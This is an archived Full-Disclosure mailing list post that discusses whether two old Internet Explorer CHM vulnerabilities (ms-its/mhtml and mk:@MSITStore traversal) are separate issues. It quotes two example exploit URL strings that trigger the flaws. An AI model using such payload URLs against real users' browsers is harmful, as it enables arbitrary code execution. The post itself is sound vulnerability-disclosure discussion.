lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY17-F37foV1qdiixj000495a4@hotmail.com>
From: lise_moorveld at hotmail.com (Lise Moorveld)
Subject: IE exploit going around on irc

Hello,

What I find interesting is that SecurityFocus links the "IE ms-its: and 
mk:@MSITStore: vulnerability" paper by Roozbeh Afrasiabi ( 
http://www.securityfocus.com/archive/1/358913 ) to the "Microsoft Internet 
Explorer Unspecified CHM File Processing Arbitrary Code Execution 
Vulnerability (bid 9658)" posting by K-otic ( 
http://www.securityfocus.com/archive/1/354447 ).
They do this in BID 9658 ( http://www.securityfocus.com/bid/9658 ).

I think SecurityFocus got this wrong...

The issue referred to by K-otic is the exploit where you use a non-existant 
mht file and an exclamation mark like so:
ms-its:mhtml:file://c:\yada.mhtml!http://www.example.com/compiledhelpfile.chm:/htmlfile.html
also described in Cert advisory VU#323070 ( 
http://www.kb.cert.org/vuls/id/323070 )
and CVE ID: CAN-2004-0380

... Roozbeh Afrasiabi doesn't use this construction anywhere in his paper... 
  what he DOES use, however (amongst others), is the directory-traversal 
style thingy:
mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program 
files\\winamp\\skins\\x.wsz::\winamp.htm
Now, I don't claim to fully grasp the Roozbeh paper either, but he does make 
a reference to Arman Nayyeri, and what I think is the following post: "IE 
5.x-6.0 allows executing arbitrary programs using showHelp()" ( 
http://archives.neohapsis.com/archives/bugtraq/2003-12/0337.html )
Oh, and Nayyeri claims Jelmer helped him with this, so Jelmer might be able 
to shed some light :)

To return to this thread, the original posting by Niek Baakman mentions the 
exclamation mark issue
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1726.html

And in a reply, Thor refers to the directory traversal-style issue (or at 
least the Roozbeh paper):
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1785.html

Anyway, do you guys think I'm right in thinking these are seperate issues?


Bye,

Lise

_________________________________________________________________
Limited-time offer: Fast, reliable MSN 9 Dial-up Internet access FREE for 2 
months! 
http://join.msn.com/?page=dept/dialup&pgmarket=en-us&ST=1/go/onm00200361ave/direct/01/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ